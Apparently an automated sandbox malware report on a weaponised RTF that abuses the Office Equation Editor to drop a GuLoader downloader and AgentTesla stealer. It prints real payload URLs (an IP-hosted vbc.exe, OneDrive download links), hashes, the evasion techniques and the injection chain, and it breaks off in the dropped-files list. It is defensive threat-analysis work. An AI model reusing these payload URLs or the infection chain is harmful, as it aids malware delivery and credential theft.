            Source: CasPol.exe, 00000007.00000002.693461440.00000000007C0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=\MISV.EXEHTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=5A15FDA1AE98540B&RESID=5A15FDA1AE98540B%21129&AUTHKEY=AC3DY6XZGK4LCRCHTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=5A15FDA1AE98540B&RESID=5A15FDA1AE98540B%21130&AUTHKEY=AF6G200UHTICGQA
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 668Thread sleep time: -180000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3028Thread sleep time: -300000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FF1740 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Users\Public\vbc.exeCode function: 3_2_00406873 FindFirstFileW,FindClose,
            Source: C:\Users\Public\vbc.exeCode function: 3_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040290B FindFirstFileW,
            Source: C:\Users\user\AppData\Roaming\misv.exeCode function: 10_2_00406873 FindFirstFileW,FindClose,
            Source: C:\Users\user\AppData\Roaming\misv.exeCode function: 10_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\AppData\Roaming\misv.exeCode function: 10_2_0040290B FindFirstFileW,
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeSystem information queried: ModuleInformation
            Source: Acly3.exe, 00000004.00000002.681294928.0000000003950000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
            Source: CasPol.exe, 00000007.00000002.692944439.00000000006FF000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
            Source: CasPol.exe, 00000007.00000002.693461440.00000000007C0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=\misv.exehttps://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21129&authkey=AC3Dy6XZGk4Lcrchttps://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21130&authkey=AF6g200UHTiCgqA
            Source: Acly3.exe, 00000004.00000002.681294928.0000000003950000.00000004.00000001.sdmp, CasPol.exe, 00000007.00000002.693461440.00000000007C0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FF1740 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FF004F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FEC4AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FF0DC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard
            Source: C:\Users\user\AppData\Local\Temp\misv.exeCode function: 11_2_02FF405C RtlAddVectoredExceptionHandler,

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F0000
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\Acly3.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Users\user\AppData\Roaming\misv.exe "C:\Users\user\AppData\Roaming\misv.exe"
            Source: C:\Users\user\AppData\Roaming\misv.exeProcess created: C:\Users\user\AppData\Local\Temp\misv.exe C:\Users\user\AppData\Local\Temp\misv.exe
            Source: CasPol.exe, 00000007.00000002.693832385.0000000000EE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: CasPol.exe, 00000007.00000002.693832385.0000000000EE0000.00000002.00020000.sdmpBinary or memory string: !Progman
            Source: CasPol.exe, 00000007.00000002.693832385.0000000000EE0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000007.00000002.697985783.000000001E511000.00000004.00000001.sdmp, type: MEMORY
            GuLoader behavior detectedShow sources
            Source: Initial fileSignature Results: GuLoader behavior
            Source: Yara matchFile source: 00000007.00000002.697985783.000000001E511000.00000004.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000007.00000002.697985783.000000001E511000.00000004.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsExploitation for Client Execution13DLL Side-Loading1Access Token Manipulation1Masquerading111OS Credential DumpingSecurity Software Discovery411Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Modify Registry1LSASS MemoryVirtualization/Sandbox Evasion21Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Virtualization/Sandbox Evasion21Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptAccess Token Manipulation1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection112Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 532180 Sample: QEw7lxB2iE Startdate: 01/12/2021 Architecture: WINDOWS Score: 100 55 Found malware configuration 2->55 57 Antivirus detection for dropped file 2->57 59 Antivirus / Scanner detection for submitted sample 2->59 61 14 other signatures 2->61 10 EQNEDT32.EXE 12 2->10         started        15 WINWORD.EXE 291 19 2->15         started        process3 dnsIp4 53 192.3.122.180, 49165, 80 AS-COLOCROSSINGUS United States 10->53 39 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->39 dropped 41 C:\Users\Public\vbc.exe, PE32 10->41 dropped 75 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->75 17 vbc.exe 9 10->17         started        43 ~WRF{D64CC614-46F7...0-504A02C9841B}.tmp, Composite 15->43 dropped file5 signatures6 process7 file8 35 C:\Users\user\AppData\Local\Temp\Acly3.exe, PE32 17->35 dropped 63 Multi AV Scanner detection for dropped file 17->63 21 Acly3.exe 17->21         started        signatures9 process10 signatures11 65 Writes to foreign memory regions 21->65 67 Tries to detect Any.run 21->67 69 Hides threads from debuggers 21->69 24 CasPol.exe 15 21->24         started        process12 dnsIp13 47 onedrive.live.com 24->47 49 fspzka.bl.files.1drv.com 24->49 51 2 other IPs or domains 24->51 37 C:\Users\user\AppData\Roaming\misv.exe, PE32 24->37 dropped 71 Tries to detect Any.run 24->71 73 Hides threads from debuggers 24->73 29 misv.exe 9 24->29         started        file14 signatures15 process16 file17 45 C:\Users\user\AppData\Local\Temp\misv.exe, PE32 29->45 dropped 77 Machine Learning detection for dropped file 29->77 33 misv.exe 29->33         started        signatures18 process19

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            QEw7lxB2iE.rtf49%VirustotalBrowse
            QEw7lxB2iE.rtf100%AviraHEUR/Rtf.Malformed

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D64CC614-46F7-4260-89D0-504A02C9841B}.tmp100%AviraEXP/CVE-2017-11882.Gen
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D64CC614-46F7-4260-89D0-504A02C9841B}.tmp100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\misv.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe20%ReversingLabsWin32.Downloader.GuLoader
            C:\Users\Public\vbc.exe20%ReversingLabsWin32.Downloader.GuLoader

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://scas.openformatrg/drawml/2006/main0%Avira URL Cloudsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            http://schemas.openformatrg/package/2006/content-t0%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
            http://schemas.open0%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
            http://www.icra.org/vocabulary/.0%URL Reputationsafe
            http://schemas.openformatrg/package/2006/r0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://192.3.122.180/2200/vbc.exe0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            onedrive.live.com
            unknown
            unknownfalse
              high
              eruitg.bl.files.1drv.com
              unknown
              unknownfalse
                high
                fspzka.bl.files.1drv.com
                unknown
                unknownfalse
                  high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://onedrive.live.com/download?cid=5A15FDA1AE9false
                    high
                    http://192.3.122.180/2200/vbc.exetrue
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.windows.com/pctv.misv.exe, 0000000A.00000002.675207324.0000000002B90000.00000002.00020000.sdmpfalse
                      high
                      https://fspzka.bl.files.1drv.com/CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpfalse
                        high
                        http://scas.openformatrg/drawml/2006/mainWINWORD.EXE, 00000000.00000002.580802446.000000000770E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://investor.msn.comCasPol.exe, 00000007.00000002.697620376.000000001E130000.00000002.00020000.sdmp, misv.exe, 0000000A.00000002.675207324.0000000002B90000.00000002.00020000.sdmpfalse
                          high
                          http://www.msnbc.com/news/ticker.txtCasPol.exe, 00000007.00000002.697620376.000000001E130000.00000002.00020000.sdmp, misv.exe, 0000000A.00000002.675207324.0000000002B90000.00000002.00020000.sdmpfalse
                            high
                            http://crl.entrust.net/server1.crl0CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpfalse
                              high
                              http://ocsp.entrust.net03CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://schemas.openformatrg/package/2006/content-tWINWORD.EXE, 00000000.00000002.580784637.00000000076CE000.00000004.00000010.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.diginotar.nl/cps/pkioverheid0CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000003.00000002.428943296.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000003.00000000.423214363.000000000040A000.00000008.00020000.sdmpfalse
                                high
                                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueAcly3.exe, 00000004.00000002.683110526.0000000003D67000.00000002.00020000.sdmp, CasPol.exe, 00000007.00000002.697779915.000000001E317000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.hotmail.com/oeCasPol.exe, 00000007.00000002.697620376.000000001E130000.00000002.00020000.sdmp, misv.exe, 0000000A.00000002.675207324.0000000002B90000.00000002.00020000.sdmpfalse
                                  high
                                  https://eruitg.bl.files.1drv.com/CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpfalse
                                    high
                                    http://schemas.openWINWORD.EXE, 00000000.00000002.580784637.00000000076CE000.00000004.00000010.sdmp, WINWORD.EXE, 00000000.00000002.580827739.000000000776E000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.580815883.000000000773E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21129&authkey=AC3Dy6XCasPol.exe, 00000007.00000002.693461440.00000000007C0000.00000004.00000001.sdmp, CasPol.exe, 00000007.00000002.692944439.00000000006FF000.00000004.00000020.sdmpfalse
                                      high
                                      https://onedrive.live.com/CasPol.exe, 00000007.00000002.692944439.00000000006FF000.00000004.00000020.sdmpfalse
                                        high
                                        https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21130&authkey=AF6g200CasPol.exe, 00000007.00000002.693461440.00000000007C0000.00000004.00000001.sdmpfalse
                                          high
                                          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckAcly3.exe, 00000004.00000002.683110526.0000000003D67000.00000002.00020000.sdmp, CasPol.exe, 00000007.00000002.697779915.000000001E317000.00000002.00020000.sdmpfalse
                                            high
                                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.icra.org/vocabulary/.Acly3.exe, 00000004.00000002.683110526.0000000003D67000.00000002.00020000.sdmp, CasPol.exe, 00000007.00000002.697779915.000000001E317000.00000002.00020000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.openformatrg/package/2006/rWINWORD.EXE, 00000000.00000002.580827739.000000000776E000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.580815883.000000000773E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.WINWORD.EXE, 00000000.00000002.577537801.0000000004390000.00000002.00020000.sdmp, vbc.exe, 00000003.00000002.429138051.0000000001DF0000.00000002.00020000.sdmp, CasPol.exe, 00000007.00000002.696569499.000000001D770000.00000002.00020000.sdmpfalse
                                              high
                                              http://investor.msn.com/CasPol.exe, 00000007.00000002.697620376.000000001E130000.00000002.00020000.sdmp, misv.exe, 0000000A.00000002.675207324.0000000002B90000.00000002.00020000.sdmpfalse
                                                high
                                                http://www.%s.comPAWINWORD.EXE, 00000000.00000002.577537801.0000000004390000.00000002.00020000.sdmp, vbc.exe, 00000003.00000002.429138051.0000000001DF0000.00000002.00020000.sdmp, CasPol.exe, 00000007.00000002.696569499.000000001D770000.00000002.00020000.sdmp, misv.exe, 0000000A.00000002.674762043.0000000001E00000.00000002.00020000.sdmpfalse
                                                • URL Reputation: safe
                                                low
                                                http://ocsp.entrust.net0DCasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://secure.comodo.com/CPS0CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpfalse
                                                  high
                                                  http://crl.entrust.net/2048ca.crl0CasPol.exe, 00000007.00000002.693435740.000000000077E000.00000004.00000020.sdmpfalse
                                                    high

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    192.3.122.180
                                                    unknownUnited States
                                                    36352AS-COLOCROSSINGUStrue

                                                    General Information

                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                    Analysis ID:532180
                                                    Start date:01.12.2021
                                                    Start time:20:08:14
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 8m 49s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:QEw7lxB2iE (renamed file extension from none to rtf)
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:12
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.expl.evad.winRTF@12/14@3/1
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 100% (good quality ratio 97.1%)
                                                    • Quality average: 84.4%
                                                    • Quality standard deviation: 23.8%
                                                    HCA Information:
                                                    • Successful, ratio: 55%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Attach to Office via COM
                                                    • Scroll down
                                                    • Close Viewer
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                    • TCP Packets have been reduced to 100
                                                    • Excluded IPs from analysis (whitelisted): 13.107.43.13, 13.107.42.12, 13.107.43.12
                                                    • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-bl-files-brs.onedrive.akadns.net, l-0003.dc-msedge.net, odc-bl-files-geo.onedrive.akadns.net, l-0004.dc-msedge.net
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    20:08:25API Interceptor47x Sleep call for process: EQNEDT32.EXE modified
                                                    20:09:28API Interceptor227x Sleep call for process: Acly3.exe modified
                                                    20:10:14API Interceptor86x Sleep call for process: CasPol.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    192.3.122.180RFQ with Specification (Fitch Solutions).docxGet hashmaliciousBrowse
                                                    • 192.3.122.180/1100/vbc.exe
                                                    3wdkxO3rGv.rtfGet hashmaliciousBrowse
                                                    • 192.3.122.180/55667/vbc.exe
                                                    zoe3408r0Z.docxGet hashmaliciousBrowse
                                                    • 192.3.122.180/3222/vbc.exe

                                                    Domains

                                                    No context

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    AS-COLOCROSSINGUSREMITTANCE ADVICE.xlsxGet hashmaliciousBrowse
                                                    • 23.94.174.144
                                                    P.O SPECIFICATION.xlsxGet hashmaliciousBrowse
                                                    • 198.23.251.13
                                                    PO6738H.xlsxGet hashmaliciousBrowse
                                                    • 198.23.251.13
                                                    VM845.htmlGet hashmaliciousBrowse
                                                    • 192.3.157.18
                                                    dJN1gSSJv5.exeGet hashmaliciousBrowse
                                                    • 107.172.73.191
                                                    REMITTANCE ADVICE.xlsxGet hashmaliciousBrowse
                                                    • 23.94.174.144
                                                    Payment Advice.xlsxGet hashmaliciousBrowse
                                                    • 192.3.110.203
                                                    RFQ No. 109050.xlsxGet hashmaliciousBrowse
                                                    • 23.94.174.144
                                                    INV-088002904SINO.xlsxGet hashmaliciousBrowse
                                                    • 107.172.76.210
                                                    quotation-linde-tunisia-plc-december-2021.xlsxGet hashmaliciousBrowse
                                                    • 107.173.191.75
                                                    RFQ with Specification (Fitch Solutions).docxGet hashmaliciousBrowse
                                                    • 192.3.122.180
                                                    VALVE.exeGet hashmaliciousBrowse
                                                    • 23.94.54.224
                                                    Quotation - Linde Tunisia PLC..xlsxGet hashmaliciousBrowse
                                                    • 107.173.191.75
                                                    Quotation 2200.xlsxGet hashmaliciousBrowse
                                                    • 107.173.143.36
                                                    DAEFWjToGE.exeGet hashmaliciousBrowse
                                                    • 198.23.172.50
                                                    V2N1M2_P.VBSGet hashmaliciousBrowse
                                                    • 192.3.121.222
                                                    SHIPPING DOCUMENT.xlsxGet hashmaliciousBrowse
                                                    • 23.94.174.144
                                                    REMITTANCE ADVICE.xlsxGet hashmaliciousBrowse
                                                    • 23.94.174.144
                                                    SOA SIL TL382920.xlsxGet hashmaliciousBrowse
                                                    • 192.3.121.173
                                                    1100.xlsxGet hashmaliciousBrowse
                                                    • 198.23.213.9

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Category:downloaded
                                                    Size (bytes):131595
                                                    Entropy (8bit):7.073841941088541
                                                    Encrypted:false
                                                    SSDEEP:3072:gbG7N2kDTHUpou4ub+HbksLwq6cttYgSj+LaQitS42:gbE/HUjwkshtOlj+LaQitE
                                                    MD5:99BDB5995C8DD619A3EC2B799D1CF868
                                                    SHA1:7EB9E30BA8572F07A1E88972AD8F14954E84EB39
                                                    SHA-256:C6F93EB69924750ADBE61115B2D6A200D534E783C6BD4CA0E2C0CD2969E9469E
                                                    SHA-512:8A2817D4CD4D9584C0C723CA96550B65F530C6DE6193B977239CE3C90C8EB0E3942B7ECF2AC3F12C730AE053C3A88993D54BFED16FEE6B2CC5AA5083105C52D6
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 20%
                                                    Reputation:low
                                                    IE Cache URL:http://192.3.122.180/2200/vbc.exe
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................................@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D64CC614-46F7-4260-89D0-504A02C9841B}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                    Category:dropped
                                                    Size (bytes):5632
                                                    Entropy (8bit):4.024629632057508
                                                    Encrypted:false
                                                    SSDEEP:48:r2eUigOoZwvG3VGz88VxOvVIO2R3HomZnJ6KolJ:yeR0ZHQz8ekvVIRR3HXZnsjv
                                                    MD5:1029B132C8D4388ADFB26B571C758001
                                                    SHA1:82B5420503765EB5B2851A4913585EE63ABFB72F
                                                    SHA-256:302EAB324A1CA4A4617D8ED9A82D18BC4B12E9692A4C9A05FE1294FC80B729DF
                                                    SHA-512:F772210F60308C1F5E1FCBF0A75AFAAE3A32223D5D73E40A13192690AB4D21A756552EA62A9C8F0AC607FBCBA7CBB6CD280CC3432DE02EF5FBCF6DFE41FBFBAD
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Reputation:low
                                                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9A9DC6B8-1AFD-4E9C-A740-EB44B2867BB2}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
